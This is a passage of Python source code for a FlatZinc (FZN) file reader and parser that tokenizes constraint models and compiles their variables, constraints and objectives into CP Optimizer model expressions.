lstr.append(', value=[')
lstr.append(', '.join(str(x) for x in self.value))
lstr.append(']')
else:
lstr.append(', value=')
lstr.append(str(self.value))
lstr.append(')')
return ''.join(lstr)
class FznVariable(FznObject):
""" Descriptor of a FZN variable
"""
__slots__ = ('name', # Variable name
'type', # Variable type (String)
'domain', # Domain
'size', # Array size (if array), None for variable
'value', # Initial value (if any)
'annotations', # Dictionary of annotations
# Attributes needed for model reduction
'ref_vars', # Tuple of variables referenced by this variable
)
def __init__(self, name, type, domain, annotations, size, value):
""" Create a new FZN variable
Args:
name: Name of the variable
type: Variable type
domain: Variable domain
annotations: Declaration annotations (dictionary)
size: Array size, None if not array
value: Initial value, None if none
"""
self.name = name
self.type = type
self.domain = domain
self.annotations = annotations
self.size = size
self.value = value
def is_defined(self):
""" Check if the variable is introduced
Return:
True if variable is introduced, False otherwise
"""
return 'is_defined_var' in self.annotations
def is_introduced(self):
""" Check if the variable is introduced
Return:
True if variable is introduced, False otherwise
"""
return 'var_is_introduced' in self.annotations
def is_output(self):
""" Check if the variable is introduced
Return:
True if variable is introduced, False otherwise
"""
return ('output_var' in self.annotations) or ('output_array' in self.annotations)
def _get_domain_bounds(self):
""" Get the variable domain bounds
Return:
Tuple of values, or single value if identical
"""
dmin = self.domain[0]
dmin = dmin[0] if isinstance(dmin, tuple) else dmin
dmax = self.domain[-1]
dmax = dmax[-1] if isinstance(dmax, tuple) else dmax
return (dmin, dmax)
def __str__(self):
lstr = [self.name, "(type=", self.type, ", dom=", str(self.domain)]
if self.is_defined():
lstr.append(", defined")
if self.is_introduced():
lstr.append(", introduced")
if self.size:
if self.value:
lstr.append(', value=[')
for i, x in enumerate(self.value):
if i > 0:
lstr.append(', ')
if isinstance(x, tuple) and isinstance(x[0], FznVariable):
lstr.append("{}[{}]".format(x[0].name, x[1]))
elif isinstance(x, FznVariable):
lstr.append(x.name)
else:
lstr.append(str(x))
lstr.append(']')
else:
lstr.append(", size={}".format(self.size))
elif self.value:
lstr.append(", value={}".format(self.value))
lstr.append(')')
return ''.join(lstr)
class FznConstraint(FznObject):
""" Descriptor of a FZN constraint
"""
__slots__ = ('predicate', # Name of the predicate
'args', # Arguments
'defvar', # Name of the variable defined by this constraint
# Attributes needed for model reduction
'ref_vars', # Tuple of variables referenced by this constraint, but not defined
)
def __init__(self, predicate, args, annotations):
""" Create a new FZN constraint
Args:
predicate: Name of the predicate
args: List or arguments
annotations: Declaration annotations
"""
self.predicate = predicate
self.args = args
self.defvar = annotations.get('defines_var', (None,))[0]
self.ref_vars = ()
def _ref_vars_iterator(self):
""" Iterator on the variables that are referenced in the arguments of this constraint.
Returns:
Iterator on all variables referenced by this constraint
"""
for a in self.args:
if is_array(a):
for v in a:
if isinstance(v, FznVariable):
yield v
elif isinstance(a, FznVariable):
yield a
def __str__(self):
lstr = [self.predicate, "("]
for i, x in enumerate(self.args):
if i > 0:
lstr.append(', ')
if isinstance(x, tuple) and isinstance(x[0], FznVariable):
lstr.append("{}[{}]".format(x[0].name, x[1]))
elif isinstance(x, (FznVariable, FznParameter)):
lstr.append(x.name)
elif isinstance(x, list):
lstr.append("[{}]".format(', '.join(str(v) for v in x)))
else:
lstr.append(str(x))
lstr.append(')')
if self.defvar:
lstr.append(":")
lstr.append(self.defvar.name)
return ''.join(lstr)
class FznObjective(FznObject):
""" Descriptor of a FZN objective
"""
__slots__ = ('operation', # Objective operation in 'satisfy', 'minimize', 'maximize'
'expr', # Target expression
'annotations', # Annotations
)
def __init__(self, operation, expr, annotations):
""" Create a new FZN constraint
Args:
operation: Objective operation in 'satisfy', 'minimize', 'maximize'
expr: Target expression
annotations: Annotations
"""
self.operation = operation
self.expr = expr
self.annotations = annotations
def __str__(self):
return "{} {} ({})".format(self.operation, self.expr, self.annotations)
class FznReader(object):
""" Reader of FZN file format """
__slots__ = ('source_file', # Source file
'tokenizer', # Reading tokenizer
'token', # Last read token
'var_map', # Dictionary of variables.
# Key is variable name, value is variable descriptor
'parameters', # List of parameters
'variables', # List of variables
'constraints', # List of model constraints
'objective', # Model objective
)
def __init__(self, mdl=None):
""" Create a new FZN reader
"""
super(FznReader, self).__init__()
self.source_file = None
self.tokenizer = None
self.token = None
self.var_map = {}
self.parameters = []
self.variables = []
self.constraints = []
self.objective = None
def parse(self, cfile):
""" Parse a FZN file
Args:
cfile: FZN file to read
Raises:
FznParserException: Parsing exception
"""
# Store file name if first file
self.source_file = cfile
self.tokenizer = FznTokenizer(file=cfile)
self._read_document()
self.tokenizer = None
def parse_string(self, str):
""" Parse a string
Result of the parsing is added to the current result model.
Args:
str: String to parse
"""
self.tokenizer = FznTokenizer(input=str)
self._read_document()
self.tokenizer = None
def write(self, out=None):
""" Write the model.
If the given output is a string, it is considered as a file name that is opened by this method
using 'utf-8' encoding.
Args:
out (Optional): Target output stream or file name. If not given, default value is sys.stdout.
"""
# Check file
if is_string(out):
with open_utf8(os.path.abspath(out), mode='w') as f:
self.write(f)
return
# Check default output
if out is None:
out = sys.stdout
# Write model content
for x in self.parameters:
print(str(x))
for x in self.variables:
print(str(x))
for x in self.constraints:
print(str(x))
out.flush()
def _read_document(self):
""" Read all FZN document
"""
try:
self._next_token()
while self._read_predicate():
pass
while self._read_parameter_or_variable():
pass
while self._read_constraint():
pass
self._read_objective()
except Exception as e:
if isinstance(e, FznParserException):
raise e
if config.context.log_exceptions:
traceback.print_exc()
self._raise_exception(str(e))
if self.token is not TOKEN_EOF:
self._raise_exception("Unexpected token '{}'".format(self.token))
def _read_predicate(self):
""" Read a predicate declaration
This function is called with first token already read and terminates with next token already read.
Returns:
True if a predicate has been read, False if nothing to process
"""
if self.token is not TOKEN_KEYWORD_PREDICATE:
return False
# Read predicate declaration
while self.token not in (TOKEN_SEMICOLON, TOKEN_EOF):
self._next_token()
if self.token is not TOKEN_SEMICOLON:
self._raise_exception("Semicolon ';' expected at the end of a predicate declaration.")
self._next_token()
return True
def _read_parameter_or_variable(self):
""" Read a parameter or variable declaration
This function is called with first token already read and terminates with next token already read.
Returns:
True if a parameter has been read, False if nothing to process
"""
tok = self.token
if tok.type is not TOKEN_TYPE_KEYWORD:
return False
# Read array size if any
arsize = self._read_array_size()
# Check if variable declaration
tok = self.token
if tok is TOKEN_KEYWORD_VAR:
self._next_token()
return self._read_variable(arsize)
# Check type name
if tok not in (TOKEN_KEYWORD_BOOL, TOKEN_KEYWORD_FLOAT, TOKEN_KEYWORD_INT, TOKEN_KEYWORD_SET):
return False
typ = tok
if typ is TOKEN_KEYWORD_SET:
self._check_token(self._next_token(), TOKEN_KEYWORD_OF)
self._check_token(self._next_token(), TOKEN_KEYWORD_INT)
# Check separating colon
self._check_token(self._next_token(), TOKEN_COLON)
# Check parameter name
tok = self._next_token()
if tok.type is not TOKEN_TYPE_SYMBOL:
self._raise_exception("Symbol expected as parameter name.")
pid = tok.value
self._check_token(self._next_token(), TOKEN_ASSIGN)
# Read expression
self._next_token()
expr = self._read_expression()
if arsize:
expr = list(expression._domain_iterator(expr))
if typ is TOKEN_KEYWORD_SET:
arsize = len(expr)
self._check_token(self.token, TOKEN_SEMICOLON)
self._next_token()
# Build result
fp = FznParameter(pid, typ.value, arsize, expr)
self.var_map[pid] = fp
self.parameters.append(fp)
return True
def _read_variable(self, arsize):
""" Read a variable declaration
This function is called with first token already read and terminates with next token already read.
Args:
arsize: Array size if any
Returns:
True if a variable has been read, False if nothing to process
"""
# Read type and domain
typ, dom = self._read_var_domain()
self._check_token(self.token, TOKEN_COLON)
tok = self._next_token()
if tok.type is not TOKEN_TYPE_SYMBOL:
self._raise_exception("Symbol expected as variable name.")
vid = tok.value
tok = self._next_token()
# Check annotations
annotations = self._read_annotations()
# print("Annotations: {}".format(annotations))
# Check expression
expr = None
if self.token is TOKEN_ASSIGN:
self._next_token()
expr = self._read_expression()
# Read ending semicolon
self._check_token(self.token, TOKEN_SEMICOLON)
self._next_token()
# Create variable
fv = FznVariable(vid, typ.value, dom, annotations, arsize, expr)
self.var_map[vid] = fv
self.variables.append(fv)
return True
def _read_constraint(self):
""" Read a constraint
This function is called with first token already read and terminates with next token already read.
Returns:
True if a variable has been read, False if nothing to process
"""
# Check constraint token
if self.token is not TOKEN_KEYWORD_CONSTRAINT:
return False
# Read constraint name
tok = self._next_token()
if tok.type is not TOKEN_TYPE_SYMBOL:
self._raise_exception("Constraint name '{}' should be a symbol.".format(tok))
cname = tok.value
# Read parameters
args = []
self._check_token(self._next_token(), TOKEN_PARENT_OPEN)
self._next_token()
while self.token is not TOKEN_PARENT_CLOSE:
args.append(self._read_expression())
if self.token is TOKEN_COMMA:
self._next_token()
self._next_token()
# Check annotations
annotations = self._read_annotations()
defvar = annotations.get('defines_var', (None,))[0]
# Read ending semicolon
self._check_token(self.token, TOKEN_SEMICOLON)
self._next_token()
# Store constraint
self.constraints.append(FznConstraint(cname, args, annotations))
return True
def _read_objective(self):
""" Read solve objective
This function is called with first token already read and terminates with next token already read.
Returns:
True if a variable has been read, False if nothing to process
"""
# Check constraint token
if self.token is not TOKEN_KEYWORD_SOLVE:
return False
self._next_token()
# Check annotations
annotations = self._read_annotations()
# Read solve objective
tok = self.token
if (tok not in (TOKEN_KEYWORD_SATISFY, TOKEN_KEYWORD_MINIMIZE, TOKEN_KEYWORD_MAXIMIZE)):
self._raise_exception(
"Solve objective '{}' should be a symbol in 'satisfy', 'minimize', 'maximize'.".format(tok))
obj = tok
self._next_token()
# Read expression if any
expr = None if obj is TOKEN_KEYWORD_SATISFY else self._read_expression()
# Read ending semicolon
self._check_token(self.token, TOKEN_SEMICOLON)
self._next_token()
# Store objective
self.objective = FznObjective(obj.value, expr, annotations)
return True
def _read_expression(self):
""" Read an expression
First expression token is already read.
Function exits with current token following the last expression token
Returns:
Expression that has been read
"""
tok = self.token
self._next_token()
# Check int constant
if tok.type is TOKEN_TYPE_INTEGER:
v1 = int(tok.value)
# Check set const
if self.token is TOKEN_INTERVAL:
tok2 = self._next_token()
if tok2.type is not TOKEN_TYPE_INTEGER:
self._raise_exception("Set upper bound {} should be an integer constant.".format(tok2))
self._next_token()
v2 = int(tok2.value)
return (v1,) if v1 == v2 else (v1, v2)
else:
return v1
# Check float constant
if tok.type is TOKEN_TYPE_FLOAT:
return float(tok.value)
# Set of integer constant
if tok is TOKEN_BRACE_OPEN:
lints = []
tok = self.token
while tok is not TOKEN_BRACE_CLOSE:
if tok.type is not TOKEN_TYPE_INTEGER:
self._raise_exception("Set element {} should be an integer constant.".format(tok))
lints.append(int(tok.value))
tok = self._next_token()
if tok is TOKEN_COMMA:
tok = self._next_token()
self._next_token()
return lints
# Check symbols
if tok.type is TOKEN_TYPE_SYMBOL:
sid = tok.value
# Check array access
if self.token is TOKEN_HOOK_OPEN:
# Access corresponding FZN element
elem = self.var_map.get(sid)
if elem is None:
self._raise_exception("Unknown symbol '{}'.".format(sid))
tok2 = self._next_token()
if tok2.type is not TOKEN_TYPE_INTEGER:
self._raise_exception("Array index '{}' should be an integer constant.".format(tok2))
self._check_token(self._next_token(), TOKEN_HOOK_CLOSE)
self._next_token()
# Build array access as a tuple (arr_name, index)
return (elem, int(tok2.value))
# Check annotation function call
elif self.token is TOKEN_PARENT_OPEN:
lexprs = [sid]
self._next_token()
while self.token is not TOKEN_PARENT_CLOSE:
lexprs.append(self._read_expression())
if self.token is TOKEN_COMMA:
self._next_token()
self._next_token()
return tuple(lexprs)
else:
# Check if corresponds to FZN element
return self.var_map.get(sid, sid)
# Array of expressions
if tok is TOKEN_HOOK_OPEN:
lexprs = []
while self.token is not TOKEN_HOOK_CLOSE:
lexprs.append(self._read_expression())
if self.token is TOKEN_COMMA:
self._next_token()
self._next_token()
return lexprs
# Check boolean constant
if tok is TOKEN_KEYWORD_TRUE:
return True
if tok is TOKEN_KEYWORD_FALSE:
return False
# Unknown
self._raise_exception("Invalid expression start: '{}'.".format(tok))
def _read_array_size(self):
""" Read an array size declaration
First expression token is already read.
Function exits with current token following the last expression token
Returns:
Array size as int if given,
-1 if size is not precised,
None if no array specified
"""
# Check array token
if self.token is not TOKEN_KEYWORD_ARRAY:
return None
# Read array specs
self._check_token(self._next_token(), TOKEN_HOOK_OPEN)
tok = self._next_token()
if tok is TOKEN_KEYWORD_INT:
arsize = -1
else:
if (tok.type is not TOKEN_TYPE_INTEGER) and tok.value != '1' :
self._raise_exception("Array size should start by '1'")
self._check_token(self._next_token(), TOKEN_INTERVAL)
tok = self._next_token()
if tok.type is not TOKEN_TYPE_INTEGER:
self._raise_exception("Array size '{}' should be integer.".format(tok))
arsize = int(tok.value)
self._check_token(self._next_token(), TOKEN_HOOK_CLOSE)
self._check_token(self._next_token(), TOKEN_KEYWORD_OF)
self._next_token()
return arsize
def _read_var_domain(self):
""" Read the domain of a variable.
First expression token is already read.
Function exits with current token following the last expression token
Returns:
Type token and variable domain
"""
# Get token
tok = self.token
typ = tok
# Check boolean domain
if typ is TOKEN_KEYWORD_BOOL:
self._next_token()
return typ, BINARY_DOMAIN
# Check undefined domain
if typ is TOKEN_KEYWORD_INT:
self._next_token()
return typ, DEFAULT_INTEGER_VARIABLE_DOMAIN
# Read set of integers or interval
if tok is TOKEN_BRACE_OPEN:
lint = sorted(self._read_expression())
dom = []
llen = len(lint)
i = 0
while i < llen:
j = i + 1
while (j < llen) and (lint[j] == lint[j - 1] + 1):
j += 1
if (j > i + 1):
dom.append((lint[i], lint[j - 1]))
else:
dom.append(lint[i])
i = j
return TOKEN_KEYWORD_INT, tuple(dom)
# Check integer domain
if tok.type is not TOKEN_TYPE_INTEGER:
self._raise_exception("Variable domain should start by an integer constant.")
self._next_token()
if self.token is TOKEN_INTERVAL:
tok2 = self._next_token()
if tok2.type is not TOKEN_TYPE_INTEGER:
self._raise_exception("Domain upper bound {} should be an integer constant.".format(tok2))
self._next_token()
v1 = int(tok.value)
v2 = int(tok2.value)
if v1 == v2:
return TOKEN_KEYWORD_INT, (v1,)
return TOKEN_KEYWORD_INT, ((v1, v2),)
else:
return TOKEN_KEYWORD_INT, (int(tok.value),)
def _read_annotations(self):
""" Read a list of annotations
First expression token is already read.
Function exits with current token following the last expression token
Returns:
Dictionary of annotations. Key is name, value is tuple or parameters.
"""
result = {}
# Check annotation start token
while self.token is TOKEN_DOUBLECOLON:
# Read annotation name
anm = self._next_token()
if anm.type is not TOKEN_TYPE_SYMBOL:
self._raise_exception("Annotation name '{}' should be a symbol.".format(anm))
args = []
tok = self._next_token()
if tok is TOKEN_PARENT_OPEN:
self._next_token()
while self.token is not TOKEN_PARENT_CLOSE:
args.append(self._read_expression())
if self.token is TOKEN_COMMA:
self._next_token()
self._next_token()
result[anm.value] = tuple(args)
return result
def _next_token(self):
""" Read next token
Returns:
Next read token, None if end of input
"""
self.token = self.tokenizer.next_token()
# print("Line {}, col {}, tok '{}'".format(self.tokenizer.line_number, self.tokenizer.read_index, self.token))
return self.token
def _check_token(self, tok, etok):
""" Check that a read token is a given one an raise an exception if not
Args:
tok: Read token
etok: Expected token
"""
if tok is not etok:
self._raise_exception("Read token '{}' instead of expected '{}'".format(tok, etok))
def _raise_exception(self, msg):
""" Raise a Parsing exception
Args:
msg: Exception message
"""
raise FznParserException(self.tokenizer.build_error_string(msg))
class FznParser(object):
""" Reader of FZN file format """
__slots__ = ('model', # Read model
'compiled', # Model compiled indicator
'reader', # FZN reader
'cpo_exprs', # Dictionary of CPO expressions. Key=name, value=CPO expr
'reduce', # Reduce model indicator
'interval_gen', # Name generator for interval var expressions
'cumul_gen', # Name generator for cumul atom expressions
'parameters', # List of parameters
'variables', # List of variables
'constraints', # List of model constraints
'objective', # Model objective
'cur_constraint', # Currently compiled constraint descriptor
'def_var_exprs', # List of expressions waiting for defvars to be defined
'cpo_variables', # Set of names of variables that are translated as real CPO variables
)
def __init__(self, mdl=None):
""" Create a new FZN format parser
Args:
mdl: Model to fill, None (default) to create a new one.
"""
super(FznParser, self).__init__()
self.model = mdl if mdl is not None else CpoModel()
self.compiled = False
self.reader = FznReader()
self.interval_gen = IdAllocator("IntervalVar_")
self.cumul_gen = IdAllocator("VarCumulAtom_")
# Do not store location information (would store parser instead of real lines)
self.model.source_loc = False
# Set model reduction indicator
self.reduce = config.context.parser.fzn_reduce
def get_model(self):
""" Get the model that have been parsed
Return:
CpoModel result of the parsing
"""
if not self.compiled:
self.compiled = True
self._compile_to_model()
return self.model
def parse(self, cfile):
""" Parse a FZN file
Args:
cfile: FZN file to read
Raises:
FznParserException: Parsing exception
"""
if self.model.source_file is None:
self.model.source_file = cfile
self.reader.parse(cfile)
def parse_string(self, str):
""" Parse a string
Result of the parsing is added to the current result model.
Args:
str: String to parse
"""
self.reader.parse_string(str)
def get_output_variables(self):
""" Get the list of model output variables
Returns:
List of output variables, in declaration order.
"""
return [v for v in self.variables if v.is_output()]
def _write_model(self, out=None):
""" Print read model (short version)
Args:
out (optional): Output stream. Default is stdout
"""
if out is None:
out = sys.stdout
out.write(self.get_model().get_cpo_string(short_output=True))
out.write("\n")
def _get_cpo_expr_map(self):
""" For testing, get the map of CPO expressions
"""
self.get_model()
return self.cpo_exprs
def _compile_to_model(self):
""" Compile FZN model into CPO model
"""
# Initialize processing
self.cpo_exprs = {}
self.parameters = self.reader.parameters
self.variables = self.reader.variables
self.constraints = self.reader.constraints
self.objective = self.reader.objective
self.def_var_exprs = {}
self.cpo_variables = set()
# Reduce model if required
if self.reduce:
self._reduce_model()
# print("=== Variables:")
# for v in self.variables:
# print(" : {}".format(v))
# print("=== Constraints:")
# for c in self.constraints:
# print(" : {}".format(c))
# sys.stdout.flush()
# Compile parameters
for x in self.parameters:
self._compile_parameter(x)
# Compile variables
for x in self.variables:
self._compile_variable(x)
# Compile constraints
if self.reduce:
for x in self.constraints:
if isinstance(x, FznVariable):
self._compile_variable(x)
else:
self._compile_constraint(x)
else:
for x in self.constraints:
self._compile_constraint(x)
# Compile objective
self._compile_objective(self.objective)
def _compile_parameter(self, fp):
""" Compile a FZN parameter into CPO model
Args:
fp: Flatzinc parameter, object of class FznParameter
"""
if fp.type in ('int', 'bool'):
expr = CpoValue(fp.value, Type_IntArray if fp.size else Type_Int)
elif fp.type == 'float':
expr = CpoValue(fp.value, Type_FloatArray if fp.size else Type_Float)
else:
expr = build_cpo_expr(fp.value)
# Add to map
expr.set_name(fp.name)
self.cpo_exprs[fp.name] = expr
def _compile_variable(self, fv):
""" Compile a FZN variable into CPO model
Args:
fv: Flatzinc variable
"""
# Check if variable is array
val = fv.value
if fv.size:
# Build array of variables
if val:
# Check if there is a reference to a not yet defined variable
if self.reduce:
for v in val:
if v in self.def_var_exprs:
self.def_var_exprs[v].append(fv)
return
arr = [self._get_cpo_expr(e) for e in val]
expr = CpoValue(arr, Type_IntVarArray if all(x.type == Type_IntVar for x in arr) else Type_IntExprArray)
else:
# Build array of variables
arr = [integer_var(name=fv.name + '[' + str(i + 1) + ']', domain=fv.domain) for i in range(fv.size)]
expr = CpoValue(arr, Type_IntVarArray)
else:
# Build single variable
if self.reduce and val:
if is_int(val):
expr = CpoValue(val, Type_Int)
elif is_bool(val):
expr = CpoValue(val, Type_Bool)
else:
expr = self._get_cpo_expr(val)
else:
# Check if value is another variable
if isinstance(val, FznVariable):
# Retrieve existing variable
expr = self.cpo_exprs.get(val.name)
assert isinstance(expr, CpoIntVar), "Variable '{}' not found".format(val.name)
else:
# Create new variable
dom = _build_domain(val) if val else fv.domain
expr = integer_var(domain=dom)
expr.set_name(fv.name)
self.cpo_exprs[fv.name] = expr
def _compile_constraint(self, fc):
""" Compile a FZN constraint into CPO model
Args:
fv: Flatzinc constraint
"""
# Search in local methods
cmeth = getattr(self, "_compile_pred_" + fc.predicate, None)
if not cmeth:
raise FznParserException("Predicate '{}' is not supported.".format(fc.predicate))
# Call compile method
cmeth(fc)
def _compile_objective(self, fo):
""" Compile a FZN objective into CPO model
Args:
fo: Flatzinc objective
"""
#print("Compile objective {}".format(fo))
if fo is None:
return
if fo.operation != 'satisfy':
expr = self._get_cpo_expr(fo.expr)
oxpr = modeler.maximize(expr) if fo.operation == 'maximize' else modeler.minimize(expr)
self._add_to_model(oxpr)
def _reduce_model(self):
""" Reduce model size by factorizing expressions when possible
"""
# Access main model elements
variables = self.variables
constraints = self.constraints
# Build reduction data related to variables
for fv in variables:
# Build list of variables that are referenced by this one
fv.ref_vars = tuple(v for v in fv.value if isinstance(v, FznVariable)) if fv.size else ()
# Set in defined variables if output
if fv.is_output():
self.cpo_variables.add(fv.name)
# In constraints, replace reference to arrays by arrays themselves
for fc in constraints:
fc.args = tuple(a.value if isinstance(a, FznVariable) and a.size else a for a in fc.args)
# Initialize set of variables defined in constraints
def_var_map = {} # Key is variable, value is constraint where variable is defined
for fc in constraints:
# print("Scan constraint {}".format(fc))
defvar = fc.defvar
if defvar is not None:
def_var_map[defvar] = fc
# Build list of all variables referenced by this constraint
res = set()
nbrefdvar = 0
for v in fc._ref_vars_iterator():
if v is defvar:
nbrefdvar += 1
else:
res.add(v)
fc.ref_vars = tuple(res)
# Special case for cumulative. All variables are supposed defined by the constraint.
if fc.predicate == 'cumulative':
for v in fc.ref_vars:
def_var_map[v] = fc
# print(" result list of ref variables: {}".format(fc.ref_vars))
# If defined variable is referenced twice in the constraint, remove it as defined (keep as declared variable)
if nbrefdvar > 1:
fc.defvar = None
self.cpo_variables.add(defvar.name)
# Determine connected variable subsets
#self._determine_connex_variables(def_var_map)
# Scan variables to move them after definition of their dependencies when needed
variables = [] # New list of variables
for fv in self.variables:
#print("Scan variable {}, Refvars: {}".format(fv, [v.name for v in fv.ref_vars]))
if any(v in def_var_map for v in fv.ref_vars):
if self._insert_in_constraints(fv, 0, def_var_map):
# Remove from list of variables (moved in constraints)
pass
else:
# Keep it as a model variable
self.cpo_variables.add(fv.name)
variables.append(fv)
else:
variables.append(fv)
self.variables = variables
# Reorder constraints
#print("\nScan constraints. Defined vars: {}".format([v.name for v in defined_vars]))
constraints = self.constraints
nbct = len(constraints)
movedcstr = set() # Constraints already moved
cx = 0
while cx < nbct:
fc = constraints[cx]
#print("Scan constraint {}. Refvars: {}".format(fc, [v.name for v in fc.ref_vars]))
#print("Defined vars: {}".format([v.name for v in defined_vars]))
# Process case of variable that has been inserted in constraints
if isinstance(fc, FznVariable):
def_var_map.pop(fc, None)
else:
# Search if constraint can be moved
if (fc not in movedcstr) and (fc.predicate != "cumulative") \
and any(v in def_var_map for v in fc.ref_vars) \
and self._insert_in_constraints(fc, cx + 1, def_var_map):
# Move constraint after all is defined
del constraints[cx]
movedcstr.add(fc)
cx -= 1
else:
# Constraint stays where it is
if fc.defvar:
def_var_map.pop(fc.defvar, None)
cx += 1
# print("Reduction ended.")
# print(" Variables:")
# for v in self.variables:
# print(" {}".format(v))
# print(" Constraints:")
# for c in self.constraints:
# print(" {}".format(c))
def _insert_in_constraints(self, fc, cx, varsctsr):
""" Insert a constraint or a variable in constraints after all its members are defined
Args:
fc: FZN constraint or variable to insert
cx: Start insertion index
varsctsr: Map of constraints where each variable is defined
Return:
True if insertion was successful, False otherwise
"""
# Build set of constraints to skip to wait for variable definition
cset = set(varsctsr[v] for v in fc.ref_vars if v in varsctsr)
# Check no dependency
if not cset:
return False
# Search in next constraints
constraints = self.constraints
for ix in xrange(cx, len(constraints)):
cset.discard(constraints[ix])
if not cset:
# Insert after this place
constraints.insert(ix + 1, fc)
# print(" inserted at best rank {}".format(cx + 1))
return True
# Impossible to insert
# print(" impossible to insert")
return False
def _determine_connex_variables(self, def_var_map):
""" Search connex sub-graphes in variables dependencies and put all multi-variables connex parts as cpo variables
Args:
def_var_map: Map of constraints where variable is defined
"""
# Create result map. Key is variable descriptor, value is set of connected variable descriptors
lcomps = {}
# For each variable, build the list of depending variables
for fv in self.variables:
stack = [fv]
dset = set(stack)
while stack:
sv = stack.pop(0)
for v in sv.ref_vars:
if v not in dset:
if v in lcomps:
dset.update(lcomps[v])
else:
dset.add(v)
stack.append(v)
fc = def_var_map.get(fv)
if fc:
for v in fc.ref_vars:
if v not in dset:
#print(" cstr.ref: {}".format(v))
if v in lcomps:
dset.update(lcomps[v])
else:
dset.add(v)
stack.append(v)
lcomps[fv] = dset
# Sort all variables list in ascending cardinality order
#print("Variables graphs:")
#for k, v in lcomps.items():
# print(" {}: {}".format(k.name, [x.name for x in v]))
lcomps = sorted(lcomps.values(), key=lambda x: len(x))
# Remove each set in next ones
nbcomps = len(lcomps)
for x1 in range(nbcomps):
s1 = lcomps[x1]
if s1:
for x2 in range(x1 + 1, nbcomps):
lcomps[x2] = lcomps[x2].difference(s1)
# Set as model variables all that are in component with at least two variables
for c in lcomps:
#print(" graph component: {}".format([x.name for x in c]))
if len(c) > 1:
for v in c:
self.cpo_variables.add(v.name)
#print("CPO model variables identified: {}".format([v for v in self.cpo_variables]))
def _get_cpo_expr(self, expr):
""" Retrieve a CPO expression from its FZN representation
Args:
expr: FZN expression
Returns:
Corresponding CPO expression
"""
#print(" _get_cpo_expr({}, type={})".format(expr, type(expr)))
# Check basic types
etyp = type(expr)
if etyp in (FznVariable, FznParameter):
v = self.cpo_exprs.get(expr.name)
if v is None:
raise FznParserException("Can not find element {}".format(expr.name))
return v
# Integer constant
if etyp in INTEGER_TYPES:
return CpoValue(expr, Type_Int)
# Array
if etyp is list:
return build_cpo_expr([self._get_cpo_expr(x) for x in expr])
# Check array access
if etyp is tuple:
# Check tuple of integers
if is_int(expr[0]):
if len(expr) > 1:
return [i for i in range(expr[0], expr[1] + 1)]
return [expr[0]]
# Access to array element
arr = self.cpo_exprs.get(expr[0].name)
if arr is None:
raise FznParserException("Can not find array {}".format(expr[0]))
return(arr.value[expr[1]-1])
# Boolean
if etyp in BOOL_TYPES:
return CpoValue(1, Type_Bool) if expr else CpoValue(0, Type_Bool)
# String
if etyp in STRING_TYPES:
v = self.cpo_exprs.get(expr)
if v is None:
raise FznParserException("Can not find element {}".format(expr))
return v
# Unknown
raise FznParserException("Can not find element {}".format(expr))
# Array predicates
def _compile_pred_array_bool_element(self, fc):
self._compile_array_xxx_element(fc)
def _compile_pred_array_int_element(self, fc):
self._compile_array_xxx_element(fc)
def _compile_pred_array_float_element(self, fc):
self._compile_array_xxx_element(fc)
def _compile_pred_array_var_bool_element(self, fc):
self._compile_array_xxx_element(fc)
def _compile_pred_array_var_int_element(self, fc):
self._compile_array_xxx_element(fc)
def _compile_pred_array_var_float_element(self, fc):
self._compile_array_xxx_element(fc)
def _compile_pred_array_bool_and(self, fc):
self._compile_op_assign_arg_1(fc, modeler.min_of)
def _compile_pred_array_bool_or(self, fc):
self._compile_op_assign_arg_1(fc, modeler.max_of)
# Bool predicates
def _compile_pred_bool_and(self, fc):
self._compile_op_assign_arg_2(fc, modeler.logical_and)
def _compile_pred_bool_or(self, fc):
self._compile_op_assign_arg_2(fc, modeler.logical_or)
def _compile_pred_bool_xor(self, fc):
self._compile_op_assign_arg_2(fc, modeler.diff)
def _compile_pred_bool_not(self, fc):
self._compile_op_assign_arg_1(fc, modeler.logical_not)
def _compile_pred_bool_eq(self, fc):
self._compile_xxx_eq(fc)
def _compile_pred_bool_eq_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.equal)
def _compile_pred_bool_le(self, fc):
self._compile_op_arg_2(fc, modeler.less_or_equal)
def _compile_pred_bool_le_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.less_or_equal)
def _compile_pred_bool_lin_eq(self, fc):
self._compile_scal_prod(fc, modeler.equal)
def _compile_pred_bool_lin_le(self, fc):
self._compile_scal_prod(fc, modeler.less_or_equal)
def _compile_pred_bool_lt(self, fc):
self._compile_op_arg_2(fc, modeler.less)
def _compile_pred_bool_lt_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.less)
def _compile_pred_bool2int(self, fc):
self._compile_xxx_eq(fc)
# Float predicates
def _compile_pred_float_abs(self, fc):
self._compile_op_assign_arg_1(fc, modeler.abs_of)
def _compile_pred_float_exp(self, fc):
self._compile_op_assign_arg_1(fc, modeler.exponent)
def _compile_pred_float_ln(self, fc):
self._compile_op_assign_arg_1(fc, modeler.log)
def _compile_pred_float_log10(self, fc):
a, r = fc.args
self._make_equal(r, modeler.log(self._get_cpo_expr(a)) / modeler.log(10), fc.defvar)
def _compile_pred_float_log2(self, fc):
a, r = fc.args
self._make_equal(r, modeler.log(self._get_cpo_expr(a)) / modeler.log(2), fc.defvar)
def _compile_pred_float_sqrt(self, fc):
a, r = fc.args
self._make_equal(r, modeler.power(self._get_cpo_expr(a), 0.5), fc.defvar)
def _compile_pred_float_eq(self, fc):
self._compile_xxx_eq(fc)
def _compile_pred_float_eq_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.equal)
def _compile_pred_float_le(self, fc):
self._compile_op_arg_2(fc, modeler.less_or_equal)
def _compile_pred_float_le_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.less_or_equal)
def _compile_pred_float_lin_eq(self, fc):
self._compile_scal_prod(fc, modeler.equal)
def _compile_pred_float_lin_le(self, fc):
self._compile_scal_prod(fc, modeler.less_or_equal)
def _compile_pred_float_lin_lt(self, fc):
self._compile_scal_prod(fc, modeler.lesst)
def _compile_pred_float_lin_ne(self, fc):
self._compile_scal_prod(fc, modeler.diff)
def _compile_pred_float_lin_eq_reif(self, fc):
self._compile_scal_prod(fc, modeler.equal, True)
def _compile_pred_float_lin_le_reif(self, fc):
self._compile_scal_prod(fc, modeler.less_or_equal, True)
def _compile_pred_float_lin_lt_reif(self, fc):
self._compile_scal_prod(fc, modeler.less, True)
def _compile_pred_float_lin_ne_reif(self, fc):
self._compile_scal_prod(fc, modeler.diff, True)
def _compile_pred_float_lt(self, fc):
self._compile_op_arg_2(fc, modeler.less)
def _compile_pred_float_lt_reif(self, fc):
